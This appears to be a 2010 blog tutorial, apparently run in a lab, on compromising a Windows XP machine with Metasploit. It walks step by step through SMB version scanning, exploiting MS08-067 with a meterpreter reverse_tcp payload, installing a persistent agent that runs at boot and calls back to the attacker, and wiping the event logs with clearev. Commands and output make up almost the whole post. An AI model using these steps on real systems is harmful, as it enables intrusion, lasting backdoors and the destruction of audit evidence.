Wednesday, September 15, 2010

Tutorial: Maintaining Access & Clearing Tracks

Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)

Step 1: Detect the OS version on the target machine

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.50
msf auxiliary(smb_version) > run

[*] 131.107.1.50 is running Windows XP Service Pack 2 (language: English) (name:LON-CL1) (domain:FABRIKAM)

Step 2: Exploit the target machine based on known vulnerability (MS08-067)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.50
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > set LPORT 8888
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 131.107.1.252:8888
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:8888 -> 131.107.1.50:1125)

Step 3: Plant or inject the Meterpreter agent on the target machine

meterpreter > run persistence -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -X -p 10000 -r 131.107.1.252
[*] Creating a persistent agent: LHOST=131.107.1.252 LPORT=10000 (interval=5 onboot=true)
sniff..

msf exploit(ms08_067_netapi) > exit -y

Step 4: Create a Meterpreter listener on our machine

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 131.107.1.252
msf exploit(handler) > set LPORT 10000
msf exploit(handler) > exploit

[*] Started reverse handler on 131.107.1.252:10000
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:10000 -> 131.107.1.50:1124)

Note: Meterpreter agent will be installed in C:\WINDOWS\TEMP directory as a .vbs file and create autostart in the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(random) on the target machine.

Now you can proceed with the last step which is Clearing Tracks (Housekeeping) as follows:

meterpreter > clearev
[*] Wiping 997 records from Application...
[*] Wiping 2045 records from System...
[*] Wiping 1 records from Security...
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)